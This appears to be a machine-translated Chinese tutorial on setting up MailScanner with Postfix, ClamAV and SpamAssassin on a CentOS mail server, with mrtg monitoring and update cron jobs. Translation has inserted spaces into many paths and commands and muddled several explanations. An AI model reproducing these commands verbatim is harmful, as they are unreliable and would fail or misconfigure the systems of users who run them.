% org-long-name% = Your Organisation Name Here
% org-long-name% = CentosMail_Leeki.Yan
% web-site% = http://www.your-organisation.com/
% web-site% = http://www.centos.eb.cn/
Run As User =
Run As User = postfix
Run As Group =
Run As Group = postfix
Incoming Queue Dir = / var / spool / mqueue.in
Incoming Queue Dir = / var / spool / postfix / hold
Outgoing Queue Dir = / var / spool / mqueue
Outgoing Queue Dir = / var / spool / postfix / incoming
MTA = sendmail
MTA = postfix
Virus Scanners = auto
Virus Scanners = clamav
Always Include SpamAssassin Report = no
Always Include SpamAssassin Report = yes
SpamAssassin User State Dir =
SpamAssassin User State Dir = / var / spool / MailScanner / spamassassin
Incoming Work User =
Incoming Work Group =
Incoming Work User = postfix
Incoming Work Group = postfix
SpamAssassin Install Prefix =
SpamAssassin Install Prefix = / usr / bin
Quarantine User =
Quarantine Group =
Quarantine User = postfix
Quarantine Group = postfix
[root @ mail MailScanner-4.62.9-3] # vi / etc / MailScanner / MailScanner.conf
[root @ mail MailScanner-4.62.9-3] # cd / var / spool / MailScanner /
[root @ mail MailScanner] # ls-al
total 20
drwxr-xr-x 4 root root 4096 Aug 31 20:34.
drwxr-xr-x 16 root root 4096 Aug 31 20:34 ..
drwxr-xr-x 8 root root 4096 Aug 31 21:01 incoming
drwxr-xr-x 2 root root 4096 Aug 31 20:34 quarantine
[root @ mail MailScanner] # mkdir spamassassin
[root @ mail MailScanner] # mkdir. spamassassin
[root @ mail MailScanner] # chown-R postfix: postfix / var / spool / MailScanner / *
[root @ mail MailScanner] # ls-al
total 28
drwxr-xr-x 6 root root 4096 Aug 31 21:48.
drwxr-xr-x 16 root root 4096 Aug 31 20:34 ..
drwxr-xr-x 2 root root 4096 Aug 31 21:48. spamassassin
drwxr-xr-x 8 postfix postfix 4096 Aug 31 21:01 incoming
drwxr-xr-x 2 postfix postfix 4096 Aug 31 20:34 quarantine
drwxr-xr-x 2 postfix postfix 4096 Aug 31 21:48 spamassassin
Main.cf file modified to allow the use of MainScanner;
[root @ mail MailScanner] # vi / etc / postfix / main.cf
Will be: # header_checks = regexp: / etc / postfix / header_checks
Changed to: header_checks = regexp: / etc / postfix / header_checks
[root @ mail MailScanner] # mv / etc / postfix / header_checks / etc / postfix / header_checks.bak
[root @ mail MailScanner] # vi / etc / postfix / header_checks
Add the following command:
(Note that Office space to use tab key, add the following content)
/ ^ Received: / HOLD
[root @ mail MailScanner] # chkconfig spamassassin on
[root @ mail MailScanner] # service spamassassin start
Starting spamd: [OK]
[root @ mail MailScanner] #
[root @ mail MailScanner] # chkconfig postfix off # turn off self-starting postfix, MailScanner start by automatically start postfix
[root @ mail MailScanner] # chkconfig MailScanner on
[root @ mail MailScanner] # / etc / rc.d / init.d / MailScanner start
Starting MailScanner daemons:
incoming postfix: [OK]
outgoing postfix: [OK]
MailScanner: [OK]
See clamav has not started, use the following command:
[root @ mail MailScanner] # ps-aux | grep clamd
Warning: bad syntax, perhaps a bogus' - '? See / usr/share/doc/procps-3.2.3/FAQ
root 12603 0.0 0.2 2992 444 pts / 0 S + 22:08 0:00 grep clamd
8. Restarted the machine about to start testing it!
[root @ mail ~] # tail-f / var / log / maillog
Send a message to start the test can be found in the log to the following:
Aug 31 22:23:18 mail MailScanner [2600]: Using locktype = flock
Aug 31 22:23:18 mail MailScanner [3338]: Using SpamAssassin results cache
Aug 31 22:23:18 mail MailScanner [3338]: Connected to SpamAssassin cache database
Aug 31 22:23:18 mail MailScanner [3338]: Enabling SpamAssassin auto-whitelist functionality ...
Aug 31 22:23:33 mail MailScanner [2709]: Using locktype = flock
Aug 31 22:23:36 mail MailScanner [3264]: Using locktype = flock
Aug 31 22:23:38 mail MailScanner [3336]: Using locktype = flock
Aug 31 22:23:39 mail MailScanner [3338]: Using locktype = flock
Aug 31 22:24:13 mail pop3-login: Login: leeki.yan [:: ffff: 10.0.0.25]
Aug 31 22:25:39 mail postfix / smtpd [3345]: connect from unknown [10.0.0.25]
Aug 31 22:25:39 mail postfix / smtpd [3345]: C38C71702CA: client = unknown [10.0.0.25]
Aug 31 22:25:40 mail postfix / cleanup [3348]: C38C71702CA: hold: header Received: from ts (unknown [10.0.0.25])?? By mail.centos.eb.cn (Postfix) with SMTP id C38C71702CA? ? for
Aug 31 22:25:40 mail postfix / cleanup [3348]: C38C71702CA: message-id = <001901c7ebdb $ f70f9ff0 $ 1900000a @ triumph>
Aug 31 22:25:40 mail postfix / smtpd [3345]: disconnect from unknown [10.0.0.25]
Aug 31 22:25:43 mail MailScanner [3264]: New Batch: Scanning 1 messages, 934 bytes
Aug 31 22:25:59 mail pop3-login: Login: leeki.yan [:: ffff: 10.0.0.25]
Aug 31 22:25:59 mail MailScanner [3264]: Virus and Content Scanning: Starting
Aug 31 22:26:14 mail MailScanner [3264]: Requeue: C38C71702CA.8937F to 14A741702E8
Aug 31 22:26:14 mail MailScanner [3264]: Uninfected: Delivered 1 messages
Aug 31 22:26:14 mail postfix / qmgr [2579]: 14A741702E8: from =
Aug 31 22:26:14 mail postfix / local [3361]: 14A741702E8: to =
Aug 31 22:26:14 mail postfix / qmgr [2579]: 14A741702E8: removed
Aug 31 22:28:29 mail pop3-login: Login: leeki.yan [:: ffff: 10.0.0.25]
From the above we can see the log, MailScanner has begun to play a role!
9. MailScanner.conf another configuration file other parameters Description:
a. use mailscanner with letters automatically add this content:
This message has been scanned for viruses and
dangerous content by MailScanner, and is
believed to be clean
The abolition of such a set method: vi / etc / MailScanner / MailScaner.conf
Sign Clean Messages = yes
Change
Sign Clean Messages = no
b. from the Internet to find a translated Chinese documents report, after warning the event will be made in Chinese warning information;
mv cn /etc/MailScanner/reports即可
/ etc / MailScanner / reports / en
Because some Chinese do not have all the LOG error:
Methods:
cd / etc / MailScanner / reports / cn
cp .. / en / * .. / cn
When prompted coverage, the election can be n!
c. do not set up to scan the area:
Edit / etc / MailScanner / MailScanner.conf documents
Modification Is Definitely Not Spam = / etc / MailScanner / rules / spam.whitelist.rules
vi / etc / MailScanner / rules / spam.whitelist.rules
Join the From: * @ centos.eb.cn yes # centos.eb.cn is a local domain name
Restart MailScannerl.
In / etc / mail / spamassassin / local.cf added inside whitelist_from * @ trinet.com.cn
This e-mail sent out will not be marked as spam, but it has been checked, I would like to ask, the distinction between these two settings there?
A: The settings whitelist_from, actually spam or check will be conducted, whitelist_from Score regard is that at -100
The tag set is not directly spam.whitelist.rules spam, spam is no longer to carry out inspections.
d.
Max Children = 5 #
This is the process of setting MailScanner, and if your computer if not strong, it is recommended you set up a small value, because the cost comparison MailScanner
Source, especially memory
e.Virus Scanner Timeout = 30 # virus killing software scans your e-mail, the longest period
f.Find Phishing Fraud = yes # whether or not to open e-mail anti-phishing detection
g.
Filename Rules =% etc-dir% / filename.rules.conf
Filetype Rules =% etc-dir% / filetype.rules.conf # these two parameters used to set up your e-mail system can receive or send the name of the annex to which
h.
Max SpamAssassin Size = 1024k # set spamassassin to scan only the largest number of e-mail
i:
Syslog Facility = mail
Log Speed = no
Log Spam = no
Log Non Spam = no
Log Permitted Filenames = no
Log Permitted Filetypes = no
Log Silent Viruses = no
Log Dangerous HTML Tags = no # These parameters are set above MailScanner logs in maillog record relevant information. If your computer if not strong, I suggest you no right or election.
10. Mailscanner-mrtg installation to monitor the flow of messages;
[root @ mail tmp] # wget http://nchc.dl.sourceforge.net/sourceforge/mailscannermrtg/mailscanner-mrtg-0.10.00-1.noarch.rpm
[root @ mail tmp] # rpm-ivh mailscanner-mrtg-0.10.00-1.noarch.rpm
warning: mailscanner-mrtg-0.10.00-1.noarch.rpm: V3 DSA signature: NOKEY, key ID e342f442
error: Failed dependencies:
mrtg> = 2.9 is needed by mailscanner-mrtg-0.10.00-1.noarch
Suggested resolutions:
/ home/buildcentos/CENTOS/en/4.0/i386/CentOS/RPMS/mrtg-2.10.15-1.i386.rpm
The above error appears, this is dependent on the causes of packet, then install mrtg, and then install mailscanner-mrtg
[root @ mail tmp] # yum-y install mrtg
Dependencies Resolved
================================================== ===========================
Package Arch Version Repository Size
================================================== ===========================
Installing:
mrtg i386 2.10.15-1 base 914 k
Installing for dependencies:
gd i386 2.0.28-5.4E base 119 k
Transaction Summary
================================================== ===========================
Install 2 Package (s)
Update 0 Package (s)
Remove 0 Package (s)
Total download size: 1.0 M
Downloading Packages:
(1 / 2): gd-2.0.28-5.4E.i38 100% |=========================| 119 kB 02:48
(2 / 2): mrtg-2.10.15-1.i38 100% |=========================| 914 kB 13:02
Running Transaction Test
Finished Transaction Test
Transaction Test Succeeded
Running Transaction
Installing: gd ######################### [1 / 2]
Installing: mrtg ######################### [2 / 2]
Installed: mrtg.i386 0:2.10.15-1
Dependency Installed: gd.i386 0:2.0.28-5.4 E
Complete!
Re-install mailscanner-mrtg, found can be installed, see the following:
[root @ mail tmp] # rpm-ivh mailscanner-mrtg-0.10.00-1.noarch.rpm
warning: mailscanner-mrtg-0.10.00-1.noarch.rpm: V3 DSA signature: NOKEY, key ID e342f442
Preparing ... ########################################### [100% ]
1: mailscanner-mrtg ########################################### [100 %]
Running MRTG to get your initial graphs (Could be slow)
Stopping httpd: [FAILED]
Starting httpd: httpd: Could not determine the server's fully qualified domain name, using 127.0.0.1 for ServerName
[OK]
Note: in mailscanner-mrtg installed, it was found inside the maillog below the total reported errors;
Oct 25 15:20:02 mailgate MailScanner-MRTG [5072]: ERROR: Snmpwalk Binary
specified in / etc / MailScanner / mailscanner-mrtg.conf is not executable
or not present. Maybe you need to install the snmp or snmp-utils
packages. See the README.SNMP file in the docs. - Skipping snmp
functions
Oct 25 15:20:02 mailgate MailScanner-MRTG [5072]: Unable to find a
mountpoint for / var / spool. Please set Spool Directory in mailscanner -
mrtg.conf to a valid mountpoint. You can see a list of mointpoints on
your system by using the df command.
Oct 25 15:20:02 mailgate MailScanner-MRTG [5072]: Unable to find a
mountpoint for / var / spool / MailScanner / incoming. Please set MailScanner
Work Directory in mailscanner-mrtg.conf to a valid mountpoint. You can
see a list of mointpoints on your system by using the df command
Error detection of the above: (because there is no snmp package installed, the CPU, MEM, such as for the empty icon)
vi / etc / Mailscanner / mailscanner-mrtg.conf
Shall
Use SNMP = yes
Snmpwalk Binary = / usr / bin / snmpwalk
MailScanner Work Directory = / var / spool / MailScanner / incoming
Spool Directory = / var / spool
Amended to read:
# Use SNMP = yes
# Snmpwalk Binary = / usr / bin / snmpwalk
MailScanner Work Directory = /
Spool Directory = /
11. Apache configuration and self-starting mailscanner-mrtg parameters Laws (on an article is already installed apache)
[root @ mail tmp] # chkconfig httpd on
[root @ mail tmp] # vi / etc / MailScanner / mailscanner-mrtg.conf
MTA = sendmail
MTA = postfix
Incoming Queue Dir = / var / spool / mqueue.in / # Sendmail
Incoming Queue Dir = / var / spool / postfix / hold / # Postfix
Outgoing Queue Dir = / var / spool / mqueue / # Sendmail
Outgoing Queue Dir = / var / spool / postfix / incoming / # Sendmail
Interfaces to Monitor = eth0 (this parameter as the case may be modified, use ifconfig-a check before making a decision)
For example, no need to modify the machine on! See the following: blue font
[root @ mail tmp] # ifconfig-a
eth0 Link encap: Ethernet HWaddr 00: C0: A8: F5: 06: CD
inet addr: 10.6.6.111 Bcast: 10.255.255.255 Mask: 255.0.0.0
inet6 addr: fe80:: 2c0: a8ff: fef5: 6cd/64 Scope: Link
UP BROADCAST RUNNING MULTICAST MTU: 1500 Metric: 1
RX packets: 5950 errors: 0 dropped: 0 overruns: 0 frame: 0
TX packets: 3547 errors: 0 dropped: 0 overruns: 0 carrier: 0
collisions: 0 txqueuelen: 1000
RX bytes: 1585146 (1.5 MiB) TX bytes: 463239 (452.3 KiB)
Click to restart the apache service, and then in the browser, type http:// the IP address of the mail server / mailscanner-mrtg / traffic plans will be able to see the!
12. Other settings;
a. Automatic Updates settings Virus database:
[root @ mail tmp] # vi / etc / freshclam.conf
Increase: LogFileMaxSize 2M
Will be # PidFile / var / run / freshclam.pid
Changed to: PidFile / var / run / freshclam.pid
[root @ mail tmp] # crontab-e
0 * / 12 * * * / usr / bin / freshclam - quiet-l / var / log / clamav / freshclam.log table updates every 12 hours the first time
b. set up spamassassin, support Chinese CCERT spam filtering rule sets and automatic update
[root @ mail tmp] # wget-N-P / usr / share / spamassassin www.ccert.edu.cn / spam / sa / Chinese_rules.cf
[root @ mail tmp] # crontab-e
Copy the following line to the inside, automatically update the rules
0 0 1 * * wget-N-P / usr / share / spamassassin www.ccert.edu.cn / spam / sa / Chinese_rules.cf; / etc / rc.d / init.d / spamassassin restart
# Sa-learn - sync-D-p user_prefs (Learning System)
# sa-learn - dump all (see the data from the study)
13. This anti-virus anti-spam features have been achieved, do not pay particular attention to one thing:
MailScanner.conf in which a parameter
Original value: SpamAssassin Local Rules Dir =
Many online references for this parameter is set to the document:
SpamAssassin Local Rules Dir = / etc / MailScanner
I recommend not setting this parameter, because I found the installation time, in accordance with the relevant Gateway set-line, the e-mail all the cards in the queue, the total weight of the log in the following information is reported, but no error message, depressed ah !
Aug 25 22:58:27 mail MailScanner [5619]: Using SpamAssassin results cache
Aug 25 22:58:27 mail MailScanner [5619]: Connected to SpamAssassin cache database
Aug 25 22:58:27 mail MailScanner [5619]: Enabling SpamAssassin auto-whitelist functionality ...
Aug 25 22:58:30 mail MailScanner [5620]: MailScanner E-Mail Virus Scanner version 4.62.9 starting ...
Aug 25 22:58:30 mail MailScanner [5620]: Read 794 hostnames from the phishing whitelist
Aug 25 22:58:30 mail MailScanner [5620]: SpamAssassin temporary working directory is / var / spool / MailScanner / incoming / SpamAssassin-Temp
Aug 25 22:58:32 mail MailScanner [5620]: Using SpamAssassin results cache
Aug 25 22:58:32 mail MailScanner [5620]: Connected to SpamAssassin cache database
Aug 25 22:58:32 mail MailScanner [5620]: Enabling SpamAssassin auto-whitelist functionality ...
Aug 25 22:58:35 mail MailScanner [5626]: MailScanner E-Mail Virus Scanner version 4.62.9 starting ...
Aug 25 22:58:35 mail MailScanner [5626]: Read 794 hostnames from the phishing whitelist
Aug 25 22:58:36 mail MailScanner [5626]: SpamAssassin temporary working directory is / var / spool / MailScanner / incoming / SpamAssassin-Temp
See queue found: whether or receive letters, e-mail all the cards in the queue: the tests made and received, will be stuck in the queue in
[root @ mail incoming] # mailq
-Queue ID-- Size - ---- Arrival Time ---- -Sender/Recipient-------
695912341DA! 5535 Sat Aug 25 22:55:59 root@centos.eb.cn
root@centos.eb.cn
07D6B2341D8! 11042 Sat Aug 25 22:34:34 leeki.yan @ centos.eb.cn
leeki.yan @ centos.eb.cn
BEEBD2341D9! 2085 Sat Aug 25 23:00:58 leeki.yan @ centos.eb.cn
leeki.yan @ centos.eb.cn
- 18 Kbytes in 3 Requests.
阅读全文...
